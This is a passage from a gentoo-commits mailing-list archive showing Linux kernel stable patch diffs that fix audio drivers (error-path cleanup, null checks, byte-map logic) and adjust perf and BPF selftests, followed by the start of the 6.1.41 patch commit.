+ 	ret = request_threaded_irq(wcd938x->aux_pdm_wd_int, NULL, wcd938x_wd_handle_irq,
+ 				   IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 				   "AUX PDM WD INT", wcd938x);
+-	if (ret)
++	if (ret) {
+ 		dev_err(dev, "Failed to request Aux WD interrupt (%d)\n", ret);
++		goto err_free_hphl_pdm_wd_int;
++	}
+ 
+ 	/* Disable watchdog interrupt for HPH and AUX */
+ 	disable_irq_nosync(wcd938x->hphr_pdm_wd_int);
+@@ -3137,7 +3172,7 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 			dev_err(component->dev,
+ 				"%s: Failed to add snd ctrls for variant: %d\n",
+ 				__func__, wcd938x->variant);
+-			goto err;
++			goto err_free_aux_pdm_wd_int;
+ 		}
+ 		break;
+ 	case WCD9385:
+@@ -3147,7 +3182,7 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 			dev_err(component->dev,
+ 				"%s: Failed to add snd ctrls for variant: %d\n",
+ 				__func__, wcd938x->variant);
+-			goto err;
++			goto err_free_aux_pdm_wd_int;
+ 		}
+ 		break;
+ 	default:
+@@ -3155,12 +3190,38 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 	}
+ 
+ 	ret = wcd938x_mbhc_init(component);
+-	if (ret)
++	if (ret) {
+ 		dev_err(component->dev,  "mbhc initialization failed\n");
+-err:
++		goto err_free_aux_pdm_wd_int;
++	}
++
++	return 0;
++
++err_free_aux_pdm_wd_int:
++	free_irq(wcd938x->aux_pdm_wd_int, wcd938x);
++err_free_hphl_pdm_wd_int:
++	free_irq(wcd938x->hphl_pdm_wd_int, wcd938x);
++err_free_hphr_pdm_wd_int:
++	free_irq(wcd938x->hphr_pdm_wd_int, wcd938x);
++err_free_clsh_ctrl:
++	wcd_clsh_ctrl_free(wcd938x->clsh_info);
++
+ 	return ret;
+ }
+ 
++static void wcd938x_soc_codec_remove(struct snd_soc_component *component)
++{
++	struct wcd938x_priv *wcd938x = snd_soc_component_get_drvdata(component);
++
++	wcd938x_mbhc_deinit(component);
++
++	free_irq(wcd938x->aux_pdm_wd_int, wcd938x);
++	free_irq(wcd938x->hphl_pdm_wd_int, wcd938x);
++	free_irq(wcd938x->hphr_pdm_wd_int, wcd938x);
++
++	wcd_clsh_ctrl_free(wcd938x->clsh_info);
++}
++
+ static int wcd938x_codec_set_jack(struct snd_soc_component *comp,
+ 				  struct snd_soc_jack *jack, void *data)
+ {
+@@ -3177,6 +3238,7 @@ static int wcd938x_codec_set_jack(struct snd_soc_component *comp,
+ static const struct snd_soc_component_driver soc_codec_dev_wcd938x = {
+ 	.name = "wcd938x_codec",
+ 	.probe = wcd938x_soc_codec_probe,
++	.remove = wcd938x_soc_codec_remove,
+ 	.controls = wcd938x_snd_controls,
+ 	.num_controls = ARRAY_SIZE(wcd938x_snd_controls),
+ 	.dapm_widgets = wcd938x_dapm_widgets,
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index b33104715c7ba..b7552b0df7c3c 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -507,12 +507,6 @@ static int fsl_sai_set_bclk(struct snd_soc_dai *dai, bool tx, u32 freq)
+ 				   savediv / 2 - 1);
+ 	}
+ 
+-	if (sai->soc_data->max_register >= FSL_SAI_MCTL) {
+-		/* SAI is in master mode at this point, so enable MCLK */
+-		regmap_update_bits(sai->regmap, FSL_SAI_MCTL,
+-				   FSL_SAI_MCTL_MCLK_EN, FSL_SAI_MCTL_MCLK_EN);
+-	}
+-
+ 	return 0;
+ }
+ 
+@@ -719,7 +713,7 @@ static void fsl_sai_config_disable(struct fsl_sai *sai, int dir)
+ 	u32 xcsr, count = 100;
+ 
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCSR(tx, ofs),
+-			   FSL_SAI_CSR_TERE, 0);
++			   FSL_SAI_CSR_TERE | FSL_SAI_CSR_BCE, 0);
+ 
+ 	/* TERE will remain set till the end of current frame */
+ 	do {
+diff --git a/sound/soc/fsl/fsl_sai.h b/sound/soc/fsl/fsl_sai.h
+index c5423f81e4560..caad5b0ac4ff4 100644
+--- a/sound/soc/fsl/fsl_sai.h
++++ b/sound/soc/fsl/fsl_sai.h
+@@ -91,6 +91,7 @@
+ /* SAI Transmit/Receive Control Register */
+ #define FSL_SAI_CSR_TERE	BIT(31)
+ #define FSL_SAI_CSR_SE		BIT(30)
++#define FSL_SAI_CSR_BCE		BIT(28)
+ #define FSL_SAI_CSR_FR		BIT(25)
+ #define FSL_SAI_CSR_SR		BIT(24)
+ #define FSL_SAI_CSR_xF_SHIFT	16
+diff --git a/sound/soc/qcom/qdsp6/q6apm.c b/sound/soc/qcom/qdsp6/q6apm.c
+index 794019286c704..16acdf3a99e1c 100644
+--- a/sound/soc/qcom/qdsp6/q6apm.c
++++ b/sound/soc/qcom/qdsp6/q6apm.c
+@@ -515,6 +515,8 @@ static int graph_callback(struct gpr_resp_pkt *data, void *priv, int op)
+ 
+ 	switch (hdr->opcode) {
+ 	case DATA_CMD_RSP_WR_SH_MEM_EP_DATA_BUFFER_DONE_V2:
++		if (!graph->ar_graph)
++			break;
+ 		client_event = APM_CLIENT_EVENT_DATA_WRITE_DONE;
+ 		mutex_lock(&graph->lock);
+ 		token = hdr->token & APM_WRITE_TOKEN_MASK;
+@@ -548,6 +550,8 @@ static int graph_callback(struct gpr_resp_pkt *data, void *priv, int op)
+ 		wake_up(&graph->cmd_wait);
+ 		break;
+ 	case DATA_CMD_RSP_RD_SH_MEM_EP_DATA_BUFFER_V2:
++		if (!graph->ar_graph)
++			break;
+ 		client_event = APM_CLIENT_EVENT_DATA_READ_DONE;
+ 		mutex_lock(&graph->lock);
+ 		rd_done = data->payload;
+@@ -650,8 +654,9 @@ int q6apm_graph_close(struct q6apm_graph *graph)
+ {
+ 	struct audioreach_graph *ar_graph = graph->ar_graph;
+ 
+-	gpr_free_port(graph->port);
++	graph->ar_graph = NULL;
+ 	kref_put(&ar_graph->refcount, q6apm_put_audioreach_graph);
++	gpr_free_port(graph->port);
+ 	kfree(graph);
+ 
+ 	return 0;
+diff --git a/sound/soc/qcom/qdsp6/topology.c b/sound/soc/qcom/qdsp6/topology.c
+index bd649c232a061..98b4d90a994a2 100644
+--- a/sound/soc/qcom/qdsp6/topology.c
++++ b/sound/soc/qcom/qdsp6/topology.c
+@@ -1100,8 +1100,8 @@ int audioreach_tplg_init(struct snd_soc_component *component)
+ 
+ 	ret = snd_soc_tplg_component_load(component, &audioreach_tplg_ops, fw);
+ 	if (ret < 0) {
+-		dev_err(dev, "tplg component load failed%d\n", ret);
+-		ret = -EINVAL;
++		if (ret != -EPROBE_DEFER)
++			dev_err(dev, "tplg component load failed: %d\n", ret);
+ 	}
+ 
+ 	release_firmware(fw);
+diff --git a/sound/soc/sof/ipc3-dtrace.c b/sound/soc/sof/ipc3-dtrace.c
+index b815b0244d9e4..8cf421577378c 100644
+--- a/sound/soc/sof/ipc3-dtrace.c
++++ b/sound/soc/sof/ipc3-dtrace.c
+@@ -187,7 +187,6 @@ static ssize_t dfsentry_trace_filter_write(struct file *file, const char __user
+ 	struct snd_sof_dfsentry *dfse = file->private_data;
+ 	struct sof_ipc_trace_filter_elem *elems = NULL;
+ 	struct snd_sof_dev *sdev = dfse->sdev;
+-	loff_t pos = 0;
+ 	int num_elems;
+ 	char *string;
+ 	int ret;
+@@ -202,11 +201,11 @@ static ssize_t dfsentry_trace_filter_write(struct file *file, const char __user
+ 	if (!string)
+ 		return -ENOMEM;
+ 
+-	/* assert null termination */
+-	string[count] = 0;
+-	ret = simple_write_to_buffer(string, count, &pos, from, count);
+-	if (ret < 0)
++	if (copy_from_user(string, from, count)) {
++		ret = -EFAULT;
+ 		goto error;
++	}
++	string[count] = '\0';
+ 
+ 	ret = trace_filter_parse(sdev, string, &num_elems, &elems);
+ 	if (ret < 0)
+diff --git a/sound/soc/tegra/tegra210_adx.c b/sound/soc/tegra/tegra210_adx.c
+index 49691d2cce509..dd3a2717f00d4 100644
+--- a/sound/soc/tegra/tegra210_adx.c
++++ b/sound/soc/tegra/tegra210_adx.c
+@@ -2,7 +2,7 @@
+ //
+ // tegra210_adx.c - Tegra210 ADX driver
+ //
+-// Copyright (c) 2021 NVIDIA CORPORATION.  All rights reserved.
++// Copyright (c) 2021-2023 NVIDIA CORPORATION.  All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -175,10 +175,20 @@ static int tegra210_adx_get_byte_map(struct snd_kcontrol *kcontrol,
+ 	mc = (struct soc_mixer_control *)kcontrol->private_value;
+ 	enabled = adx->byte_mask[mc->reg / 32] & (1 << (mc->reg % 32));
+ 
++	/*
++	 * TODO: Simplify this logic to just return from bytes_map[]
++	 *
++	 * Presently below is required since bytes_map[] is
++	 * tightly packed and cannot store the control value of 256.
++	 * Byte mask state is used to know if 256 needs to be returned.
++	 * Note that for control value of 256, the put() call stores 0
++	 * in the bytes_map[] and disables the corresponding bit in
++	 * byte_mask[].
++	 */
+ 	if (enabled)
+ 		ucontrol->value.integer.value[0] = bytes_map[mc->reg];
+ 	else
+-		ucontrol->value.integer.value[0] = 0;
++		ucontrol->value.integer.value[0] = 256;
+ 
+ 	return 0;
+ }
+@@ -192,19 +202,19 @@ static int tegra210_adx_put_byte_map(struct snd_kcontrol *kcontrol,
+ 	int value = ucontrol->value.integer.value[0];
+ 	struct soc_mixer_control *mc =
+ 		(struct soc_mixer_control *)kcontrol->private_value;
++	unsigned int mask_val = adx->byte_mask[mc->reg / 32];
+ 
+-	if (value == bytes_map[mc->reg])
++	if (value >= 0 && value <= 255)
++		mask_val |= (1 << (mc->reg % 32));
++	else
++		mask_val &= ~(1 << (mc->reg % 32));
++
++	if (mask_val == adx->byte_mask[mc->reg / 32])
+ 		return 0;
+ 
+-	if (value >= 0 && value <= 255) {
+-		/* update byte map and enable slot */
+-		bytes_map[mc->reg] = value;
+-		adx->byte_mask[mc->reg / 32] |= (1 << (mc->reg % 32));
+-	} else {
+-		/* reset byte map and disable slot */
+-		bytes_map[mc->reg] = 0;
+-		adx->byte_mask[mc->reg / 32] &= ~(1 << (mc->reg % 32));
+-	}
++	/* Update byte map and slot */
++	bytes_map[mc->reg] = value % 256;
++	adx->byte_mask[mc->reg / 32] = mask_val;
+ 
+ 	return 1;
+ }
+diff --git a/sound/soc/tegra/tegra210_amx.c b/sound/soc/tegra/tegra210_amx.c
+index d064cc67fea66..a71c5916da791 100644
+--- a/sound/soc/tegra/tegra210_amx.c
++++ b/sound/soc/tegra/tegra210_amx.c
+@@ -2,7 +2,7 @@
+ //
+ // tegra210_amx.c - Tegra210 AMX driver
+ //
+-// Copyright (c) 2021 NVIDIA CORPORATION.  All rights reserved.
++// Copyright (c) 2021-2023 NVIDIA CORPORATION.  All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -203,10 +203,20 @@ static int tegra210_amx_get_byte_map(struct snd_kcontrol *kcontrol,
+ 	else
+ 		enabled = amx->byte_mask[0] & (1 << reg);
+ 
++	/*
++	 * TODO: Simplify this logic to just return from bytes_map[]
++	 *
++	 * Presently below is required since bytes_map[] is
++	 * tightly packed and cannot store the control value of 256.
++	 * Byte mask state is used to know if 256 needs to be returned.
++	 * Note that for control value of 256, the put() call stores 0
++	 * in the bytes_map[] and disables the corresponding bit in
++	 * byte_mask[].
++	 */
+ 	if (enabled)
+ 		ucontrol->value.integer.value[0] = bytes_map[reg];
+ 	else
+-		ucontrol->value.integer.value[0] = 0;
++		ucontrol->value.integer.value[0] = 256;
+ 
+ 	return 0;
+ }
+@@ -221,25 +231,19 @@ static int tegra210_amx_put_byte_map(struct snd_kcontrol *kcontrol,
+ 	unsigned char *bytes_map = (unsigned char *)&amx->map;
+ 	int reg = mc->reg;
+ 	int value = ucontrol->value.integer.value[0];
++	unsigned int mask_val = amx->byte_mask[reg / 32];
+ 
+-	if (value == bytes_map[reg])
++	if (value >= 0 && value <= 255)
++		mask_val |= (1 << (reg % 32));
++	else
++		mask_val &= ~(1 << (reg % 32));
++
++	if (mask_val == amx->byte_mask[reg / 32])
+ 		return 0;
+ 
+-	if (value >= 0 && value <= 255) {
+-		/* Update byte map and enable slot */
+-		bytes_map[reg] = value;
+-		if (reg > 31)
+-			amx->byte_mask[1] |= (1 << (reg - 32));
+-		else
+-			amx->byte_mask[0] |= (1 << reg);
+-	} else {
+-		/* Reset byte map and disable slot */
+-		bytes_map[reg] = 0;
+-		if (reg > 31)
+-			amx->byte_mask[1] &= ~(1 << (reg - 32));
+-		else
+-			amx->byte_mask[0] &= ~(1 << reg);
+-	}
++	/* Update byte map and slot */
++	bytes_map[reg] = value % 256;
++	amx->byte_mask[reg / 32] = mask_val;
+ 
+ 	return 1;
+ }
+diff --git a/tools/perf/Makefile.config b/tools/perf/Makefile.config
+index 898226ea8cadc..fac6ba07eacdb 100644
+--- a/tools/perf/Makefile.config
++++ b/tools/perf/Makefile.config
+@@ -149,9 +149,9 @@ FEATURE_CHECK_LDFLAGS-libcrypto = -lcrypto
+ ifdef CSINCLUDES
+   LIBOPENCSD_CFLAGS := -I$(CSINCLUDES)
+ endif
+-OPENCSDLIBS := -lopencsd_c_api
++OPENCSDLIBS := -lopencsd_c_api -lopencsd
+ ifeq ($(findstring -static,${LDFLAGS}),-static)
+-  OPENCSDLIBS += -lopencsd -lstdc++
++  OPENCSDLIBS += -lstdc++
+ endif
+ ifdef CSLIBS
+   LIBOPENCSD_LDFLAGS := -L$(CSLIBS)
+diff --git a/tools/perf/tests/shell/test_uprobe_from_different_cu.sh b/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
+new file mode 100644
+index 0000000000000..00d2e0e2e0c28
+--- /dev/null
++++ b/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
+@@ -0,0 +1,77 @@
++#!/bin/bash
++# test perf probe of function from different CU
++# SPDX-License-Identifier: GPL-2.0
++
++set -e
++
++temp_dir=$(mktemp -d /tmp/perf-uprobe-different-cu-sh.XXXXXXXXXX)
++
++cleanup()
++{
++	trap - EXIT TERM INT
++	if [[ "${temp_dir}" =~ ^/tmp/perf-uprobe-different-cu-sh.*$ ]]; then
++		echo "--- Cleaning up ---"
++		perf probe -x ${temp_dir}/testfile -d foo
++		rm -f "${temp_dir}/"*
++		rmdir "${temp_dir}"
++	fi
++}
++
++trap_cleanup()
++{
++        cleanup
++        exit 1
++}
++
++trap trap_cleanup EXIT TERM INT
++
++cat > ${temp_dir}/testfile-foo.h << EOF
++struct t
++{
++  int *p;
++  int c;
++};
++
++extern int foo (int i, struct t *t);
++EOF
++
++cat > ${temp_dir}/testfile-foo.c << EOF
++#include "testfile-foo.h"
++
++int
++foo (int i, struct t *t)
++{
++  int j, res = 0;
++  for (j = 0; j < i && j < t->c; j++)
++    res += t->p[j];
++
++  return res;
++}
++EOF
++
++cat > ${temp_dir}/testfile-main.c << EOF
++#include "testfile-foo.h"
++
++static struct t g;
++
++int
++main (int argc, char **argv)
++{
++  int i;
++  int j[argc];
++  g.c = argc;
++  g.p = j;
++  for (i = 0; i < argc; i++)
++    j[i] = (int) argv[i][0];
++  return foo (3, &g);
++}
++EOF
++
++gcc -g -Og -flto -c ${temp_dir}/testfile-foo.c -o ${temp_dir}/testfile-foo.o
++gcc -g -Og -c ${temp_dir}/testfile-main.c -o ${temp_dir}/testfile-main.o
++gcc -g -Og -o ${temp_dir}/testfile ${temp_dir}/testfile-foo.o ${temp_dir}/testfile-main.o
++
++perf probe -x ${temp_dir}/testfile --funcs foo
++perf probe -x ${temp_dir}/testfile foo
++
++cleanup
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index 18e319e6ce335..d1ab5f23f4e4c 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -181,9 +181,9 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 				e = i - 1;
+ 		} else {
+ 			if (i >= 4)
+-				e = i - 4;
+-			else if (i == 3)
+-				e = i - 2;
++				e = i - 3;
++			else if (i >= 1)
++				e = i - 1;
+ 			else
+ 				e = 0;
+ 		}
+diff --git a/tools/testing/selftests/bpf/prog_tests/align.c b/tools/testing/selftests/bpf/prog_tests/align.c
+index de27a29af2703..8baebb41541dc 100644
+--- a/tools/testing/selftests/bpf/prog_tests/align.c
++++ b/tools/testing/selftests/bpf/prog_tests/align.c
+@@ -2,7 +2,7 @@
+ #include <test_progs.h>
+ 
+ #define MAX_INSNS	512
+-#define MAX_MATCHES	16
++#define MAX_MATCHES	24
+ 
+ struct bpf_reg_match {
+ 	unsigned int line;
+@@ -267,6 +267,7 @@ static struct bpf_align_test tests[] = {
+ 			 */
+ 			BPF_MOV64_REG(BPF_REG_5, BPF_REG_2),
+ 			BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_6),
++			BPF_MOV64_REG(BPF_REG_4, BPF_REG_5),
+ 			BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 14),
+ 			BPF_MOV64_REG(BPF_REG_4, BPF_REG_5),
+ 			BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 4),
+@@ -280,6 +281,7 @@ static struct bpf_align_test tests[] = {
+ 			BPF_MOV64_REG(BPF_REG_5, BPF_REG_2),
+ 			BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 14),
+ 			BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_6),
++			BPF_MOV64_REG(BPF_REG_4, BPF_REG_5),
+ 			BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 4),
+ 			BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_6),
+ 			BPF_MOV64_REG(BPF_REG_4, BPF_REG_5),
+@@ -311,44 +313,52 @@ static struct bpf_align_test tests[] = {
+ 			{15, "R4=pkt(id=1,off=18,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			{15, "R5=pkt(id=1,off=14,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* Variable offset is added to R5 packet pointer,
+-			 * resulting in auxiliary alignment of 4.
++			 * resulting in auxiliary alignment of 4. To avoid BPF
++			 * verifier's precision backtracking logging
++			 * interfering we also have a no-op R4 = R5
++			 * instruction to validate R5 state. We also check
++			 * that R4 is what it should be in such case.
+ 			 */
+-			{17, "R5_w=pkt(id=2,off=0,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{18, "R4_w=pkt(id=2,off=0,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{18, "R5_w=pkt(id=2,off=0,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* Constant offset is added to R5, resulting in
+ 			 * reg->off of 14.
+ 			 */
+-			{18, "R5_w=pkt(id=2,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{19, "R5_w=pkt(id=2,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* At the time the word size load is performed from R5,
+ 			 * its total fixed offset is NET_IP_ALIGN + reg->off
+ 			 * (14) which is 16.  Then the variable offset is 4-byte
+ 			 * aligned, so the total offset is 4-byte aligned and
+ 			 * meets the load's requirements.
+ 			 */
+-			{23, "R4=pkt(id=2,off=18,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
+-			{23, "R5=pkt(id=2,off=14,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
++			{24, "R4=pkt(id=2,off=18,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
++			{24, "R5=pkt(id=2,off=14,r=18,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* Constant offset is added to R5 packet pointer,
+ 			 * resulting in reg->off value of 14.
+ 			 */
+-			{25, "R5_w=pkt(off=14,r=8"},
++			{26, "R5_w=pkt(off=14,r=8"},
+ 			/* Variable offset is added to R5, resulting in a
+-			 * variable offset of (4n).
++			 * variable offset of (4n). See comment for insn #18
++			 * for R4 = R5 trick.
+ 			 */
+-			{26, "R5_w=pkt(id=3,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{28, "R4_w=pkt(id=3,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{28, "R5_w=pkt(id=3,off=14,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* Constant is added to R5 again, setting reg->off to 18. */
+-			{27, "R5_w=pkt(id=3,off=18,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
++			{29, "R5_w=pkt(id=3,off=18,r=0,umax=1020,var_off=(0x0; 0x3fc))"},
+ 			/* And once more we add a variable; resulting var_off
+ 			 * is still (4n), fixed offset is not changed.
+ 			 * Also, we create a new reg->id.
+ 			 */
+-			{28, "R5_w=pkt(id=4,off=18,r=0,umax=2040,var_off=(0x0; 0x7fc)"},
++			{31, "R4_w=pkt(id=4,off=18,r=0,umax=2040,var_off=(0x0; 0x7fc)"},
++			{31, "R5_w=pkt(id=4,off=18,r=0,umax=2040,var_off=(0x0; 0x7fc)"},
+ 			/* At the time the word size load is performed from R5,
+ 			 * its total fixed offset is NET_IP_ALIGN + reg->off (18)
+ 			 * which is 20.  Then the variable offset is (4n), so
+ 			 * the total offset is 4-byte aligned and meets the
+ 			 * load's requirements.
+ 			 */
+-			{33, "R4=pkt(id=4,off=22,r=22,umax=2040,var_off=(0x0; 0x7fc)"},
+-			{33, "R5=pkt(id=4,off=18,r=22,umax=2040,var_off=(0x0; 0x7fc)"},
++			{35, "R4=pkt(id=4,off=22,r=22,umax=2040,var_off=(0x0; 0x7fc)"},
++			{35, "R5=pkt(id=4,off=18,r=22,umax=2040,var_off=(0x0; 0x7fc)"},
+ 		},
+ 	},
+ 	{
+@@ -681,6 +691,6 @@ void test_align(void)
+ 		if (!test__start_subtest(test->descr))
+ 			continue;
+ 
+-		CHECK_FAIL(do_test_single(test));
++		ASSERT_OK(do_test_single(test), test->descr);
+ 	}
+ }
+diff --git a/tools/testing/selftests/bpf/prog_tests/sk_assign.c b/tools/testing/selftests/bpf/prog_tests/sk_assign.c
+index 3e190ed639767..1374b626a9858 100644
+--- a/tools/testing/selftests/bpf/prog_tests/sk_assign.c
++++ b/tools/testing/selftests/bpf/prog_tests/sk_assign.c
+@@ -29,7 +29,23 @@ static int stop, duration;
+ static bool
+ configure_stack(void)
+ {
++	char tc_version[128];
+ 	char tc_cmd[BUFSIZ];
++	char *prog;
++	FILE *tc;
++
++	/* Check whether tc is built with libbpf. */
++	tc = popen("tc -V", "r");
++	if (CHECK_FAIL(!tc))
++		return false;
++	if (CHECK_FAIL(!fgets(tc_version, sizeof(tc_version), tc)))
++		return false;
++	if (strstr(tc_version, ", libbpf "))
++		prog = "test_sk_assign_libbpf.bpf.o";
++	else
++		prog = "test_sk_assign.bpf.o";
++	if (CHECK_FAIL(pclose(tc)))
++		return false;
+ 
+ 	/* Move to a new networking namespace */
+ 	if (CHECK_FAIL(unshare(CLONE_NEWNET)))
+@@ -46,8 +62,8 @@ configure_stack(void)
+ 	/* Load qdisc, BPF program */
+ 	if (CHECK_FAIL(system("tc qdisc add dev lo clsact")))
+ 		return false;
+-	sprintf(tc_cmd, "%s %s %s %s", "tc filter add dev lo ingress bpf",
+-		       "direct-action object-file ./test_sk_assign.bpf.o",
++	sprintf(tc_cmd, "%s %s %s %s %s", "tc filter add dev lo ingress bpf",
++		       "direct-action object-file", prog,
+ 		       "section tc",
+ 		       (env.verbosity < VERBOSE_VERY) ? " 2>/dev/null" : "verbose");
+ 	if (CHECK(system(tc_cmd), "BPF load failed;",
+@@ -129,15 +145,12 @@ get_port(int fd)
+ static ssize_t
+ rcv_msg(int srv_client, int type)
+ {
+-	struct sockaddr_storage ss;
+ 	char buf[BUFSIZ];
+-	socklen_t slen;
+ 
+ 	if (type == SOCK_STREAM)
+ 		return read(srv_client, &buf, sizeof(buf));
+ 	else
+-		return recvfrom(srv_client, &buf, sizeof(buf), 0,
+-				(struct sockaddr *)&ss, &slen);
++		return recvfrom(srv_client, &buf, sizeof(buf), 0, NULL, NULL);
+ }
+ 
+ static int
+diff --git a/tools/testing/selftests/bpf/progs/connect4_prog.c b/tools/testing/selftests/bpf/progs/connect4_prog.c
+index ec25371de789d..7ef49ec04838d 100644
+--- a/tools/testing/selftests/bpf/progs/connect4_prog.c
++++ b/tools/testing/selftests/bpf/progs/connect4_prog.c
+@@ -32,7 +32,7 @@
+ #define IFNAMSIZ 16
+ #endif
+ 
+-__attribute__ ((noinline))
++__attribute__ ((noinline)) __weak
+ int do_bind(struct bpf_sock_addr *ctx)
+ {
+ 	struct sockaddr_in sa = {};
+diff --git a/tools/testing/selftests/bpf/progs/test_sk_assign.c b/tools/testing/selftests/bpf/progs/test_sk_assign.c
+index 98c6493d9b91d..21b19b758c4eb 100644
+--- a/tools/testing/selftests/bpf/progs/test_sk_assign.c
++++ b/tools/testing/selftests/bpf/progs/test_sk_assign.c
+@@ -16,6 +16,16 @@
+ #include <bpf/bpf_helpers.h>
+ #include <bpf/bpf_endian.h>
+ 
++#if defined(IPROUTE2_HAVE_LIBBPF)
++/* Use a new-style map definition. */
++struct {
++	__uint(type, BPF_MAP_TYPE_SOCKMAP);
++	__type(key, int);
++	__type(value, __u64);
++	__uint(pinning, LIBBPF_PIN_BY_NAME);
++	__uint(max_entries, 1);
++} server_map SEC(".maps");
++#else
+ /* Pin map under /sys/fs/bpf/tc/globals/<map name> */
+ #define PIN_GLOBAL_NS 2
+ 
+@@ -35,6 +45,7 @@ struct {
+ 	.max_elem = 1,
+ 	.pinning = PIN_GLOBAL_NS,
+ };
++#endif
+ 
+ char _license[] SEC("license") = "GPL";
+ 
+diff --git a/tools/testing/selftests/bpf/progs/test_sk_assign_libbpf.c b/tools/testing/selftests/bpf/progs/test_sk_assign_libbpf.c
+new file mode 100644
+index 0000000000000..dcf46adfda041
+--- /dev/null
++++ b/tools/testing/selftests/bpf/progs/test_sk_assign_libbpf.c
+@@ -0,0 +1,3 @@
++// SPDX-License-Identifier: GPL-2.0
++#define IPROUTE2_HAVE_LIBBPF
++#include "test_sk_assign.c"
+diff --git a/tools/testing/selftests/tc-testing/config b/tools/testing/selftests/tc-testing/config
+index aec4de8bea78b..0c3978fd6bcc9 100644
+--- a/tools/testing/selftests/tc-testing/config
++++ b/tools/testing/selftests/tc-testing/config
+@@ -5,6 +5,8 @@ CONFIG_NF_CONNTRACK=m
+ CONFIG_NF_CONNTRACK_MARK=y
+ CONFIG_NF_CONNTRACK_ZONES=y
+ CONFIG_NF_CONNTRACK_LABELS=y
++CONFIG_NF_CONNTRACK_PROCFS=y
++CONFIG_NF_FLOW_TABLE=m
+ CONFIG_NF_NAT=m
+ CONFIG_NETFILTER_XT_TARGET_LOG=m
+ 
+diff --git a/tools/testing/selftests/tc-testing/settings b/tools/testing/selftests/tc-testing/settings
+new file mode 100644
+index 0000000000000..e2206265f67c7
+--- /dev/null
++++ b/tools/testing/selftests/tc-testing/settings
+@@ -0,0 +1 @@
++timeout=900


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-24 20:27 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-24 20:27 UTC (permalink / raw
  To: gentoo-commits

commit:     902923f3e529e47f769727e5dcb73e64e9397029
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jul 24 20:26:48 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jul 24 20:26:48 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=902923f3

Linux patch 6.1.41

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1040_linux-6.1.41.patch | 310 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 314 insertions(+)

diff --git a/0000_README b/0000_README
index e1e77420..3a1ce4bc 100644
--- a/0000_README
+++ b/0000_README
@@ -203,6 +203,10 @@ Patch:  1039_linux-6.1.40.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.40
 
+Patch:  1040_linux-6.1.41.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.41
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1040_linux-6.1.41.patch b/1040_linux-6.1.41.patch
new file mode 100644
index 00000000..55534ffd
--- /dev/null
+++ b/1040_linux-6.1.41.patch
@@ -0,0 +1,310 @@
+diff --git a/Makefile b/Makefile
+index 2bb0c01391a98..6c940cce3656a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 40
++SUBLEVEL = 41
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/x86/include/asm/microcode.h b/arch/x86/include/asm/microcode.h
+index 79b1d009e34e4..19a0b4005ffa8 100644
+--- a/arch/x86/include/asm/microcode.h
++++ b/arch/x86/include/asm/microcode.h
+@@ -5,6 +5,7 @@
+ #include <asm/cpu.h>
+ #include <linux/earlycpio.h>
+ #include <linux/initrd.h>
++#include <asm/microcode_amd.h>
+ 
+ struct ucode_patch {
+ 	struct list_head plist;
+diff --git a/arch/x86/include/asm/microcode_amd.h b/arch/x86/include/asm/microcode_amd.h
+index e6662adf3af4d..9675c621c1ca4 100644
+--- a/arch/x86/include/asm/microcode_amd.h
